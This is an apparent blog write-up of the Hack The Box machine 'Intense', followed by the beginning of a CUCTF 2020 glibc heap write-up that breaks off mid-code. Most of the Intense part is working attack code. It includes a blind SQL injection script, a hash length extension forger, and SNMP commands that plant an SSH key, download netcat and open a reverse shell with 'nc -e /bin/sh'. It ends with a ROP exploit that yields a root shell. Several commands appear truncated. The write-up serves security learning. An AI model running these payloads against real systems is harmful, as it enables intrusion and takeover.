To summarize, the session lives in an “auth” cookie made of 2 base64 portions separated by a period. The first portion is built from the return value of try_login(), a dictionary of username and secret, which create_session() formats as username=username;secret=hash;. The second portion is a signature over that data: the digest of sha256(SECRET + data), where SECRET is a random bytestring whose length is randomly chosen between 8 and 14 bytes (randrange(8, 15)). Both portions are base64 encoded and joined to form the value of “auth.” Many subsequent operations call get_session(), which calls parse_session(), which first verifies the data against the signature. Interestingly enough, if you find a way to bypass this verification, parse_session() would let you append key=value pairs that overwrite keys already set earlier in the loop.
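The key-overwrite behaviour is easy to check offline. The sketch below reproduces only the session formatting and the field loop, with the signature check left out. It assumes each group is parsed inside its own try/except, which is what lets a junk group (such as the binary padding a length extension inserts) be skipped. `parse_fields` and the junk bytes are hypothetical stand-ins.

```python
def create_session(data):
    """Same "k1=v1;k2=v2;" format as the quoted lwt.create_session()."""
    return "".join(f"{k}={v};" for k, v in data.items()).encode()


def parse_fields(data):
    """The field loop of lwt.parse_session(), with the signature check omitted.

    Assumes a per-group try/except, so malformed groups are skipped and a repeated
    key simply overwrites the earlier value."""
    info = {}
    for group in data.split(b";"):
        try:
            if not group:
                continue
            key, val = group.split(b"=")
            info[key.decode()] = val
        except Exception:
            continue
    return info


guest = create_session({"username": "guest",
                        "secret": "84983c60f7daadc1cb8698621f802c0d9f9a3c3c295c810748fb048115c186ec"})
junk = b"\x80\x00\x00\x00\x03\x38"  # hypothetical stand-in for binary padding bytes
tampered = guest + junk + b";username=admin;secret=f1fc12010c094016def791e1435ddfdcaeccf8250e36630c0bc93285c2971105;"
print(parse_fields(tampered)["username"])
```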

Becoming admin lets you interact with some interesting functionality:

def admin_view_log(filename):
if not path.exists(f"logs/{filename}"):
return f"Can't find {filename}"
with open(f"logs/{filename}") as out:
def admin_list_log(logdir):
if not path.exists(f"logs/{logdir}"):
return f"Can't find {logdir}"
return listdir(logdir)
def admin_home():
if not is_admin(request):
return render_template("admin.html")
@admin.route("/admin/log/view", methods=["POST"])
def view_log():
if not is_admin(request):
logfile = request.form.get("logfile")
if logfile:
logcontent = admin_view_log(logfile)
return logcontent
return ''
@admin.route("/admin/log/dir", methods=["POST"])
def list_log():
if not is_admin(request):
logdir = request.form.get("logdir")
if logdir:
logdir = admin_list_log(logdir)
return str(logdir)
return ''

There's a ridiculously obvious lfi here. Now, would there be any endpoints that would allow us to extract data to become admin?

Let's take a look at a feature the guest user has access to, the submitmessage() function:

@app.route("/submitmessage", methods=["POST"])
def submitmessage():
    message = request.form.get("message", '')
    if len(message) > 140:
        return "message too long"
    if badword_in_str(message):
        return "forbidden word in message"
    try:
        query_db("insert into messages values ('%s')" % message)
    except sqlite3.Error as e:
        return str(e)
    return "OK"

def badword_in_str(data):
    data = data.lower()
    badwords = ["rand", "system", "exec", "date"]
    for badword in badwords:
        if badword in data:
            return True
    return False

You're restricted to a 140-byte message, and there are some blacklisted words. However, this time query_db isn't really used “correctly,” as the application formats your input directly into the query, leading to an obvious sqlite injection. One thing to note is that it doesn't show you the result besides success or failure, so this is a clear case for an error-based injection. I just called load_extension when the comparison in my error brute force is false. This returns an authorization error (plus the extension won't even exist). My teammate Bianca had another interesting way to error brute this: she passed bad inputs to json_extract to trigger an error when the comparison fails.

After messing around briefly in db-fiddle, I based my script on the following sqli template:

injection: ' or (select case when (select substr(username,1,1) from users limit 1 offset 0) = 'a' then 'W' else load_extension('L', 0x1) end));--

query: insert into messages values ('' or (select case when (select substr(username,1,1) from users limit 1 offset 0) = 'a' then 'W' else load_extension('L', 0x1) end));--')

I wrote the following script to retrieve the admin username and hash with a simple linear brute, as the username probably will just be admin, and the hex charset is small enough:

import requests
URL = 'http://intense.htb'
target = f"{URL}/submitmessage"
sess = requests.Session()
sess.post(f"{URL}/postlogin", data={"username":"guest", "password":"guest"})

def check(payload):
    r = sess.post(target, data={"message":payload})
    return True if "not authorized" not in r.text else False

def leak(username=True):
    offset = 0
    result = ''
    charset = 'abcdef0123456789' if not username else 'abcdefghijklmnopqrstuvwxyz'
    leak_target = "secret" if not username else "username"
    for i in range(0, 64, 1):
        for c in charset:
            payload = f"(select substr({leak_target},{i+1},1) from users limit 1 offset {offset}) = '{c}'"
            template = f"' or (select case when {payload} then 'W' else load_extension('L', 0x1) end));--"
            assert(len(template) <= 140)
            if check(template):
                result += c
                print(f"Result so far: {result}")
                break
            if c == charset[-1]:
                return result
    return result

print(f"username: {leak()}")
print(f"hash: {leak(username=False)}")
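To sanity-check the oracle offline, the same template can be run against a throwaway in-memory database with Python's sqlite3 module. Everything here is a hypothetical stand-in: the table layout, the placeholder secret, and submit_message(), which only mimics the formatted insert in submitmessage(). The sketch assumes the local SQLite build provides load_extension() with extension loading left disabled (Python's default). Under that assumption the false branch errors out, and the oracle simply keys on a clean "OK".

```python
import sqlite3

# Hypothetical local stand-in for the box's database (placeholder data).
db = sqlite3.connect(":memory:")
db.execute("create table users (username text, secret text)")
db.execute("create table messages (message text)")
db.execute("insert into users values ('admin', 'f1fc12010c09')")


def submit_message(message):
    """Mimics submitmessage(): the message is formatted straight into the SQL."""
    try:
        db.execute("insert into messages values ('%s')" % message)
    except sqlite3.Error as e:
        return str(e)
    return "OK"


def check(condition):
    """True if `condition` holds; otherwise the CASE falls through to
    load_extension(), which raises an error because extension loading is off."""
    payload = f"' or (select case when {condition} then 'W' else load_extension('L', 0x1) end));--"
    if len(payload) > 140:
        raise ValueError("payload exceeds the 140-character limit")
    return submit_message(payload) == "OK"


def leak(column, charset, max_len=64):
    """Linear brute force of users.<column>, one character position at a time."""
    result = ""
    for i in range(1, max_len + 1):
        for c in charset:
            if check(f"(select substr({column},{i},1) from users limit 1 offset 0) = '{c}'"):
                result += c
                break
        else:
            break  # nothing matched: we are past the end of the value
    return result


print(leak("username", "abcdefghijklmnopqrstuvwxyz"))
print(leak("secret", "abcdef0123456789"))
```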

I ended up receiving the following hash: f1fc12010c094016def791e1435ddfdcaeccf8250e36630c0bc93285c2971105

But it's not crackable with any wordlist or rule combination I have... this is where the way the application signs and checks sessions comes in. Remember how it signed the session with the secret in front before hashing? Under these conditions, sha256 is vulnerable to the hash length extension attack. This post explains the attack much better, as I just ended up relying on the hash_extender tool. In our case, we know the hash function, the data, and the original signature. The only unknown is the secret's length, which is small enough to brute force. So we can append data and generate a valid signature without knowing the secret. Appending the data can make us admin, since the session parser doesn't check for duplicate keys. As for the attack itself, the general gist is that a sha256 digest is the hash's full internal state after processing the padded input. You can load the signature back in as that state and keep hashing the appended data from there. The result is a valid signature for secret + data + padding + appended data.
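hash_extender did the heavy lifting in practice, but the attack is small enough to sketch in pure Python. Below is a self-contained SHA-256 (constants derived from the primes rather than typed in) whose compression loop can be restarted from a known digest. `extend()` and the other helper names are my own, and the secret is a random stand-in for the box's SECRET. The forged message is data + glue + appended data. The glue is the padding SHA-256 would have added to secret + data, which is why the secret's length has to be guessed.

```python
import hashlib
import math
import os
import struct

MASK = 0xFFFFFFFF


def _first_primes(n):
    primes, cand = [], 2
    while len(primes) < n:
        if all(cand % p for p in primes):
            primes.append(cand)
        cand += 1
    return primes


def _icbrt(x):
    """Integer cube root: the largest r with r**3 <= x."""
    lo, hi = 0, 1 << ((x.bit_length() + 2) // 3 + 1)
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if mid ** 3 <= x:
            lo = mid
        else:
            hi = mid - 1
    return lo


_P = _first_primes(64)
K = [_icbrt(p << 96) & MASK for p in _P]           # fractional bits of cube roots
H0 = [math.isqrt(p << 64) & MASK for p in _P[:8]]  # fractional bits of square roots


def _rotr(x, n):
    return ((x >> n) | (x << (32 - n))) & MASK


def _compress(state, block):
    w = list(struct.unpack(">16I", block))
    for i in range(16, 64):
        s0 = _rotr(w[i - 15], 7) ^ _rotr(w[i - 15], 18) ^ (w[i - 15] >> 3)
        s1 = _rotr(w[i - 2], 17) ^ _rotr(w[i - 2], 19) ^ (w[i - 2] >> 10)
        w.append((w[i - 16] + s0 + w[i - 7] + s1) & MASK)
    a, b, c, d, e, f, g, h = state
    for i in range(64):
        t1 = (h + (_rotr(e, 6) ^ _rotr(e, 11) ^ _rotr(e, 25))
              + ((e & f) ^ (~e & g)) + K[i] + w[i]) & MASK
        t2 = ((_rotr(a, 2) ^ _rotr(a, 13) ^ _rotr(a, 22))
              + ((a & b) ^ (a & c) ^ (b & c))) & MASK
        h, g, f, e, d, c, b, a = g, f, e, (d + t1) & MASK, c, b, a, (t1 + t2) & MASK
    return [(x + y) & MASK for x, y in zip(state, (a, b, c, d, e, f, g, h))]


def md_padding(msg_len):
    """Padding SHA-256 appends to a msg_len-byte message: 0x80, zeros, 64-bit bit length."""
    return b"\x80" + b"\x00" * ((55 - msg_len) % 64) + struct.pack(">Q", 8 * msg_len)


def sha256_resume(state, data, prior_len):
    """Finish SHA-256 from `state`, which has already absorbed prior_len bytes (a multiple of 64)."""
    msg = data + md_padding(prior_len + len(data))
    for off in range(0, len(msg), 64):
        state = _compress(state, msg[off:off + 64])
    return struct.pack(">8I", *state)


def extend(sig, data, secret_len, append):
    """Return (forged_data, forged_sig) with sha256(secret + forged_data) == forged_sig,
    using only the original signature and a guessed secret length."""
    glue = md_padding(secret_len + len(data))
    prior_len = secret_len + len(data) + len(glue)
    state = list(struct.unpack(">8I", sig))
    return data + glue + append, sha256_resume(state, append, prior_len)


# Demo: here we pass the true length; the real script loops over candidate lengths instead.
secret = os.urandom(11)
data = b"username=guest;secret=84983c60f7daadc1cb8698621f802c0d9f9a3c3c295c810748fb048115c186ec;"
sig = hashlib.sha256(secret + data).digest()
forged, forged_sig = extend(sig, data, len(secret),
                            b";username=admin;secret=f1fc12010c094016def791e1435ddfdcaeccf8250e36630c0bc93285c2971105;")
print(hashlib.sha256(secret + forged).digest() == forged_sig)
```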

Since the secret is a variable length, I wrote the following script to bruteforce a valid session:

from base64 import b64encode, b64decode
from subprocess import PIPE, Popen
import requests, binascii
URL = "http://intense.htb/"
sessions = requests.Session()
sessions.post(f"{URL}postlogin", data={"username":"guest", "password":"guest"})
signature = binascii.hexlify(b64decode(sessions.cookies.get_dict()['auth'].split('.')[1]))
commands = []
for i in range(8, 16, 1):
    command = ["./hash_extender", "-d", "username=guest;secret=84983c60f7daadc1cb8698621f802c0d9f9a3c3c295c810748fb048115c186ec;", "-s", signature, "--signature-format=hex",
               "-a", ";username=admin;secret=f1fc12010c094016def791e1435ddfdcaeccf8250e36630c0bc93285c2971105;", "-l", str(i)]
    process = Popen(command, stdout=PIPE)
    (output, err) = process.communicate()
    commands.append(output)
for c in commands:
    fake_sig = c.decode().split('\n')[2].split(' ')[2]
    forged = c.decode().split('\n')[3].split(' ')[2]
    fake = b64encode(binascii.unhexlify(forged)).decode() + "." + b64encode(binascii.unhexlify(fake_sig)).decode()
    r = requests.get(url=f"{URL}admin", cookies={"auth":fake})
    print("Trying: " + fake + "\n")
    if '403' not in r.text:
        break

Now, with a valid session, we can go to the admin functions and perform lfi.

With some requests, I also noticed the user flag (and the source code for the pwnable) in the user directory with payload ../../../../../../../../../home/user.

Recalling our earlier enumeration, I remember the snmp port. Pulling out /etc/snmp/snmpd.conf, I see the following:

agentAddress udp:161
view systemonly included .
view systemonly included .
rocommunity public default -V systemonly
rwcommunity SuP3RPrivCom90
# Note that setting these values here, results in the corresponding MIB objects being 'read-only'
# See snmpd.conf(5) for more details
sysLocation Sitting on the Dock of the Bay
sysContact Me <user@intense.htb>
# Application + End-to-End layers
sysServices 72
# Process Monitoring
# At least one 'mountd' process
proc mountd
# No more than 4 'ntalkd' processes - 0 is OK
proc ntalkd 4
# At least one 'sendmail' process, but no more than 10
proc sendmail 10 1
# Disk Monitoring
# 10MBs required on root disk, 5% free on /var, 10% free on all other disks
disk / 10000
disk /var 5%
includeAllDisks 10%
# System Load
# Unacceptable 1-, 5-, and 15-minute load averages
load 12 10 5
# send SNMPv1 traps
trapsink localhost public
# Event MIB - automatically generate alerts
# Remember to activate the 'createUser' lines above
iquerySecName internalUser
rouser internalUser
# generate traps on UCD error conditions
defaultMonitors yes
# generate traps on linkUp/Down
linkUpDownNotifications yes
# Arbitrary extension commands
extend test1 /bin/echo Hello, world!
extend-sh test2 echo Hello, world! ; echo Hi there ; exit 35
master agentx

Seeing the rw community string made me immediately think of rce over snmp, which is very well documented here. To quote the article:

The SNMP community string is essentially a plaintext password that allows access to a device’s statistics and configuration.

Since nsExtend-related operations limit the payload length (255 chars for the command), I ended up generating a shorter ssh key to give myself ssh access as the Debian-snmp user with the following commands:

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 'nsExtendStatus."command"'  = createAndGo 'nsExtendCommand."command"' = /bin/sh 'nsExtendArgs."command"' = '-c "echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQC1VxdqPOpZvaJtuvtTMZJlchmQCLw8cC0tvD79eSlaL0hsS0XRFRaAKFf55UP1SarbED+teHFQUPbLa6uJlBxJQrPLQfujmo6su7P2jGPDZrwxIgKA7Om8cUvLXuNdHrTVwze68z7QBCIi6m1ofHBvZJOdWMt6O0idpybWefz7Cw== root@kaliVM > /dev/shm/w"'

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 'nsExtendStatus."command"'  = createAndGo 'nsExtendCommand."command"' = /bin/sh 'nsExtendArgs."command"' = '-c "cat /dev/shm/w > /var/lib/snmp/.ssh/authorized_keys"'

Remember to trigger it each time with: snmpwalk -v 2c -c SuP3RPrivCom90 nsExtendObjects

When you pull the pwnable's source code (note_server.c) through the lfi earlier on, you can see that it listens on port 5001, so we can port forward it out:

ssh -N -L 5001: Debian-snmp@intense.htb -i key

However, we still need libc and the binary, and from the lfi on /etc/passwd, we know the Debian-snmp user's shell is /bin/false. So I ended up popping a shell with the following commands to transfer files out. We had to use nohup to keep snmp from hanging and then crashing, and some fiddling was required for the commands to work:

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 'nsExtendStatus."command"'  = createAndGo 'nsExtendCommand."command"' = /usr/bin/nohup 'nsExtendArgs."command"' =  'wget -q -O /dev/shm/nc'

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 'nsExtendStatus."command"'  = createAndGo 'nsExtendCommand."command"' = /usr/bin/nohup 'nsExtendArgs."command"' = 'chmod +x /dev/shm/nc'

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 'nsExtendStatus."command"'  = createAndGo 'nsExtendCommand."command"' = /usr/bin/nohup 'nsExtendArgs."command"' = '/dev/shm/nc 1337 -e /bin/sh'

The following was the source:

// gcc -Wall -pie -fPIE -fstack-protector-all -D_FORTIFY_SOURCE=2 -Wl,-z,now -Wl,-z,relro note_server.c -o note_server
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define BUFFER_SIZE 1024

void handle_client(int sock) {
    char note[BUFFER_SIZE];
    uint16_t index = 0;
    uint8_t cmd;
    // copy var
    uint8_t buf_size;
    uint16_t offset;
    uint8_t copy_size;

    while (1) {
        // get command ID
        if (read(sock, &cmd, 1) != 1) {
            exit(1);
        }
        switch(cmd) {
            // write note
            case 1:
                if (read(sock, &buf_size, 1) != 1) {
                    exit(1);
                }
                // prevent user to write over the buffer
                if (index + buf_size > BUFFER_SIZE) {
                    exit(1);
                }
                // write note
                if (read(sock, &note[index], buf_size) != buf_size) {
                    exit(1);
                }
                index += buf_size;
                break;
            // copy part of note to the end of the note
            case 2:
                // get offset from user want to copy
                if (read(sock, &offset, 2) != 2) {
                    exit(1);
                }
                // sanity check: offset must be > 0 and < index
                if (offset < 0 || offset > index) {
                    exit(1);
                }
                // get the size of the buffer we want to copy
                if (read(sock, &copy_size, 1) != 1) {
                    exit(1);
                }
                // prevent user to write over the buffer's note
                if (index > BUFFER_SIZE) {
                    exit(1);
                }
                // copy part of the buffer to the end
                memcpy(&note[index], &note[offset], copy_size);
                index += copy_size;
                break;
            // show note
            case 3:
                write(sock, note, index);
                return;
        }
    }
}

int main( int argc, char *argv[] ) {
    int sockfd, newsockfd, portno;
    unsigned int clilen;
    struct sockaddr_in serv_addr, cli_addr;
    int pid;

    /* ignore SIGCHLD, prevent zombies */
    struct sigaction sigchld_action = {
        .sa_handler = SIG_DFL,
        .sa_flags = SA_NOCLDWAIT
    };
    sigaction(SIGCHLD, &sigchld_action, NULL);

    /* First call to socket() function */
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sockfd < 0) {
        perror("ERROR opening socket");
        exit(1);
    }
    if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &(int){ 1 }, sizeof(int)) < 0)
        perror("setsockopt(SO_REUSEADDR) failed");

    /* Initialize socket structure */
    bzero((char *) &serv_addr, sizeof(serv_addr));
    portno = 5001;
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_addr.s_addr = inet_addr("");
    serv_addr.sin_port = htons(portno);

    /* Now bind the host address using bind() call.*/
    if (bind(sockfd, (struct sockaddr *) &serv_addr, sizeof(serv_addr)) < 0) {
        perror("ERROR on binding");
        exit(1);
    }
    listen(sockfd, 5);
    clilen = sizeof(cli_addr);

    while (1) {
        newsockfd = accept(sockfd, (struct sockaddr *) &cli_addr, &clilen);
        if (newsockfd < 0) {
            perror("ERROR on accept");
            exit(1);
        }
        /* Create child process */
        pid = fork();
        if (pid < 0) {
            perror("ERROR on fork");
            exit(1);
        }
        if (pid == 0) {
            /* This is the client process */
            close(sockfd);
            handle_client(newsockfd);
            exit(0);
        }
        else {
            close(newsockfd);
        }
    } /* end of while */
}

This is just a variation of the forking stack overflow server pwns I've written about extensively in my Rope and Patents writeups, so I'll skim through this pwn. It's another forking note app, with PIE, full RELRO, and a stack canary (which is trivial to beat once leaked, since every forked child inherits the same canary).

Your options are ‘\x01’ for write, ‘\x02’ for copy, and ‘\x03’ for show. When you write data, you send a length, and the server checks whether the current index plus that length exceeds the buffer size. If it doesn't, you can send that many bytes into the note char array starting at the current index, and the index is incremented by the size you requested. Note that the requested size is a single byte, so one write covers at most 255 bytes.
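To make that wire format concrete, here is a small Python sketch that only builds the byte strings for each command (the helper names are my own, hypothetical ones, not part of the challenge). It assumes the 2-byte offset is read in little-endian order, which is what read(sock, &offset, 2) gives you on x86-64.

```python
import struct

# Command IDs read by handle_client() in note_server.c
CMD_WRITE, CMD_COPY, CMD_SHOW = 1, 2, 3


def encode_write(data: bytes) -> bytes:
    """Encode note data as one or more write commands.

    The size field is a single byte, so data longer than 255 bytes
    has to be split across several commands.
    """
    out = bytearray()
    for start in range(0, len(data), 255):
        chunk = data[start:start + 255]
        out += bytes([CMD_WRITE, len(chunk)]) + chunk
    return bytes(out)


def encode_copy(offset: int, size: int) -> bytes:
    # 2-byte offset (little-endian on x86-64) followed by a 1-byte size
    return bytes([CMD_COPY]) + struct.pack("<HB", offset, size)


def encode_show() -> bytes:
    return bytes([CMD_SHOW])


msg = encode_write(b"A" * 1024)   # 4 full chunks of 255 plus one chunk of 4
print(len(msg), encode_copy(1024, 255).hex())
```

Filling the whole 1024-byte note therefore takes five write commands, which is exactly what the write() helper in my script does.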

For copy, you get 2 bytes to specify an offset, and the offset is checked to remain in the range of 0 and the current index. However, the size to be copied isn't checked, so there is a potential overflow once it copies from the note buffer at the specified offset to the note buffer at the current index. It also increases the index by the specified copy amount, so we can read out of bounds with this as well (as show doesn't check).
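A bookkeeping-only model of those checks shows why copy is the weak spot (the class name is hypothetical, and it tracks only the index, not the bytes): write refuses to pass 1024, but copy checks the index before adding copy_size, so a single 255-byte copy pushes the index to 1279 and show then returns data well past the buffer. The offsets in the usage (canary at 1032, saved rbp at 1040, return address at 1048) come from my exploit script.

```python
BUFFER_SIZE = 1024


class NoteIndexModel:
    """Tracks only the uint16_t index of handle_client(); note contents are ignored."""

    def __init__(self):
        self.index = 0

    def write(self, buf_size: int) -> None:
        assert 0 <= buf_size <= 0xFF                  # single-byte size
        if self.index + buf_size > BUFFER_SIZE:
            raise ValueError("exit(1): write would pass the buffer")
        self.index += buf_size

    def copy(self, offset: int, copy_size: int) -> None:
        assert 0 <= offset <= 0xFFFF and 0 <= copy_size <= 0xFF
        if offset > self.index:                        # 'offset < 0' is never true for a uint16_t
            raise ValueError("exit(1): offset past index")
        if self.index > BUFFER_SIZE:                   # index is checked, index + copy_size is not
            raise ValueError("exit(1): index past buffer")
        # memcpy(&note[index], &note[offset], copy_size) would run here
        self.index = (self.index + copy_size) & 0xFFFF

    def show_len(self) -> int:
        return self.index                              # write(sock, note, index) has no bound


n = NoteIndexModel()
for _ in range(4):
    n.write(255)
n.write(4)                  # index == 1024, the buffer is "full"
n.copy(1024, 255)           # allowed: index (1024) is not > BUFFER_SIZE
print(n.show_len())         # bytes returned by show, enough to cover offsets 1032..1055
```

Note that only one such copy is possible per connection: once the index is past 1024, a second copy is rejected, which is why every stage of the exploit reconnects.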

For show, there isn't much to know except that it writes out index bytes of the note and returns, so the forked child ends.

In my exploit, I first increased the index to 1024 and then abused copy's missing size check to push the index past the end of the buffer, so that the output of option 3 leaks the canary, a stack address, and the PIE base. Next, I wrote a ROP chain (with the proper padding and the canary in front) at the start of the buffer, padding the write so the index reached 1024 again, and then had copy move the length of the chain from offset 0 to the current index (1024). That overflows the saved return address, so triggering a return with show runs the chain and leaks a libc address. The same principle then lets me dup2 the socket file descriptor onto stdin, stdout, and stderr and pop open a shell. Here is my final script:

from pwn import *

context.log_level = 'debug'
elf = ELF('./note_server')
libc = ELF('./')
TIME = 0.1
IP = 'localhost'
FD = 4  # client socket fd inside the forked child
p = remote(IP, 5001)

def reconnect():
    return remote(IP, 5001)

#1040 till rbp, 1032 till canary
#can only send a byte for size/offset
def write(data):
    times = len(data) // 255
    extra = len(data) % 255
    for i in range(times):
        write_helper(255, data[i*255:i*255+255])
    if extra:
        write_helper(extra, data[-extra:])

def write_helper(size, data):
    p.send('\x01' + p8(size))
    sleep(TIME)
    p.send(data)
    sleep(TIME)

def copy(offset, size):
    p.send('\x02' + p16(offset) + p8(size))
    sleep(TIME)

def show():
    p.send('\x03')

padding = 'B' * 8

# stage 1: fill the note to index 1024, then copy 255 bytes so show() leaks canary, rbp and PIE
write('A' * 1024)
copy(1024, 255)
show() #ends the function each time
leaks = p.recv(1032 + 24)
canary = u64(leaks[1032:1032+8])
rbp = u64(leaks[1040:1048])
elf.address = u64(leaks[1048:1056]) - 0xf54
log.info("Canary: %s" % hex(canary))
log.info("Stack leak: %s" % hex(rbp))
log.info("Pie base: %s" % hex(elf.address))

# stage 2: write(FD, write@got) to leak libc
p = reconnect()
ropnop = elf.address + 0x00000000000008ce # ret;
poprdi = elf.address + 0x0000000000000fd3 # pop rdi; ret;
poprsir15 = elf.address + 0x0000000000000fd1 # pop rsi; pop r15; ret;
payload = padding + p64(canary) + p64(rbp) + p64(poprdi) + p64(FD) + p64(poprsir15) + p64(elf.got['write']) + p64(0) + p64(elf.symbols['write'])
write(payload.ljust(1024, 'A'))
copy(0, len(payload))
show()
leaks = p.recv(0x450)
libc.address = u64(leaks[0x448:0x450]) - libc.symbols['write']
log.info("Libc Base: %s" % hex(libc.address))

# stage 3: dup2 the socket onto stdin/stdout/stderr, then system("/bin/sh")
p = reconnect()
payload = padding + p64(canary) + p64(rbp)
payload += p64(poprdi) + p64(FD) + p64(poprsir15) + p64(0) + p64(0) + p64(libc.symbols['dup2'])
payload += p64(poprdi) + p64(FD) + p64(poprsir15) + p64(1) + p64(0) + p64(libc.symbols['dup2'])
payload += p64(poprdi) + p64(FD) + p64(poprsir15) + p64(2) + p64(0) + p64(libc.symbols['dup2'])
payload += p64(poprdi) + p64(next(libc.search('/bin/sh'))) + p64(ropnop) + p64(libc.symbols['system'])
write(payload.ljust(1024, 'A'))
copy(0, len(payload))
show()
p.interactive()
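To sanity-check the layout the script relies on, here is a small simulation (a sketch, not part of the exploit) of the note buffer plus the stack slots above it, using the offsets from the script: canary at 1032, saved rbp at 1040, and the return address at 1048. It replays write(payload.ljust(1024, 'A')) followed by copy(0, len(payload)), with made-up values standing in for the leaks.

```python
import struct

NOTE_SIZE = 1024
CANARY_OFF, RBP_OFF, RET_OFF = 1032, 1040, 1048   # offsets used by the exploit script


def p64(value: int) -> bytes:
    return struct.pack("<Q", value)


def simulate_copy_overflow(payload: bytes) -> bytearray:
    """Replay write(payload.ljust(1024, 'A')) and copy(0, len(payload)) on a fake frame."""
    assert len(payload) <= 0xFF, "copy size is a single byte"
    mem = bytearray(NOTE_SIZE + len(payload) + 0x40)   # note[] plus the stack above it
    mem[:NOTE_SIZE] = payload.ljust(NOTE_SIZE, b"A")
    index = NOTE_SIZE
    # memcpy(&note[index], &note[0], len(payload))
    mem[index:index + len(payload)] = mem[:len(payload)]
    return mem


# made-up stand-ins for the leaked canary, saved rbp and a pop rdi gadget
canary, rbp, gadget = 0x1122334455667700, 0x7FFD00001000, 0x555555554FD3
payload = b"B" * 8 + p64(canary) + p64(rbp) + p64(gadget) + p64(4)
mem = simulate_copy_overflow(payload)
print(mem[CANARY_OFF:CANARY_OFF + 8] == p64(canary), mem[RET_OFF:RET_OFF + 8] == p64(gadget))
```

The 8 bytes of padding exist only to line the canary up with offset 1032; everything after the saved rbp lands on the return address and above.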

And that should get us a root shell! Thanks once again to sokafr for the fun box, and pottm and bjornmorten for giving my writeup a read through before publishing.

Sunday, October 4, 2020

CUCTF 2020 Dr. Xorisaurus Heap Writeup (glibc 2.32 UAF)

Here is my writeup for my 2.32 glibc heap challenge (Dr. Xorisaurus) from CUCTF 2020; make sure to check out the writeup for my kernel challenge Hotrod as well!

One important concept to note about glibc 2.32 is the new safe linking mechanism on the singly linked lists. This new protection scheme is discussed in depth here. Basically, for singly linked freelists (fastbins and tcache bins), free chunk fds are obfuscated by the following scheme: (stored pointer) = (address of fd pointer >> 12) ^ (fd pointer). With a heap leak, this protection can be easily bypassed as heap behavior in glibc is predictable, which is what this challenge will revolve around. Bruteforcing, or leaking a copy of the stored pointer and applying some basic crypto knowledge, can also help you recover the original data in some cases (especially when the chunks in the list are close together).
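Here is a minimal Python sketch of that scheme. protect_ptr/reveal_ptr mirror glibc's PROTECT_PTR/REVEAL_PTR macros, and demangle_same_page illustrates the "basic crypto" recovery: assuming the fd slot and the pointer it stores share all bits above bit 12 (i.e. they sit in the same 4 KiB page), the top 12 bits of the stored value are plaintext, and each recovered 12-bit group unlocks the next one. The addresses in the usage are made up.

```python
MASK64 = (1 << 64) - 1


def protect_ptr(pos: int, ptr: int) -> int:
    """Safe-linking encoding: stored = (pos >> 12) ^ ptr, where pos is the fd slot's address."""
    return ((pos >> 12) ^ ptr) & MASK64


def reveal_ptr(pos: int, stored: int) -> int:
    """Decoding is the same XOR, because (x ^ k) ^ k == x."""
    return protect_ptr(pos, stored)


def demangle_same_page(stored: int) -> int:
    """Recover ptr without knowing pos, assuming pos >> 12 == ptr >> 12.

    Under that assumption stored == ptr ^ (ptr >> 12), so the top 12 bits
    are already plaintext and each recovered group reveals the next 12 bits.
    """
    mask = 0xFFF << 52
    while mask:
        stored ^= (stored & mask) >> 12
        mask >>= 12
    return stored


pos = 0x55555555B2A0          # made-up address of a freed chunk's fd slot
ptr = 0x55555555B2C0          # made-up next chunk in the same tcache bin
stored = protect_ptr(pos, ptr)
print(hex(stored), hex(reveal_ptr(pos, stored)), hex(demangle_same_page(stored)))
```

A special case worth remembering: the last chunk in a bin has a NULL fd, so its stored value is just pos >> 12, and shifting it left by 12 hands you the page it lives on.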

In this challenge, we were given a libc with debug symbols, linker, and patchelf'd binary with the following protections:

Now, when reversing this binary, one should find 4 features. 

You can fill a glass, examine a glass, drain a glass, and switch the contents of a glass according to the menu. There is also an initial SIGALRM alarm at the beginning, and you can only have a maximum of 25 glasses. Filling a glass is equivalent to an allocation: it finds a free index in the global glasses array for you, asks for a size between 0x60 and the larger fastbin sizes, and reads in some data. Examining a glass is useful for leaks, as it just puts() the contents of the chunk; note that examinations can only be used twice (presumably once for a libc leak and once for a heap leak). Draining is the equivalent of a free, and it is safe because it nulls out the pointer in the global array. You can drain as many times as you like, but once you swap contents (feature 4), you can only free one more time. The swap function frees a chunk and then immediately reallocates based on 2 choices of size; after the allocation, the binary reads in 8 bytes. This is where the 8 byte UAF comes in: the conditional is poorly written, so if you select an invalid choice, there is no reallocation and the 8 bytes are read into the freed chunk's metadata (take a look at the decompilation below). Now let's plan out our exploit:

One might be tempted to use swap to create a double free, but the 8 byte UAF only reaches the fd pointer, not the tcache key stored right after it, so freeing that chunk again trips glibc's tcache double free check. Some might think about filling the tcache and then applying a fastbin dup attack, but since you can only free one more time after swapping, you cannot perform the extra free needed to get past the fastbin double free check.

To obtain a leak, one might be tempted to just free a chunk and then reallocate it to see the obfuscated pointer (and then shift left by 12 bits to recover heap base). However, the read call during the allocation requires at least one byte (unless pty is enabled server side), so 5 nibbles of the heap address will be missing. This means there would be 1 byte of entropy on the leak, but a proof of work is required for 3 bytes of a random sha256 hash on remote, so bruteforcing isn't as feasible.
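A quick sketch of that arithmetic, under two assumptions: the leaked chunk was alone in its bin (so its stored pointer is just pos >> 12) and it sits in the heap's first page (so pos >> 12 == heap_base >> 12). With exactly the low byte of the stored value overwritten, 256 heap bases remain possible. The helper name and addresses are hypothetical.

```python
def heap_base_candidates(clobbered: int) -> list:
    """List heap bases consistent with a safe-linking leak whose low byte was overwritten.

    Assumes the leaked chunk was alone in its bin (fd == NULL), so its stored
    pointer is just pos >> 12, and that it sits in the heap's first page, so
    pos >> 12 == heap_base >> 12.
    """
    high = clobbered & ~0xFF
    return [(high | low) << 12 for low in range(0x100)]


heap_base = 0x55D4C3A1F000            # made-up page-aligned heap base
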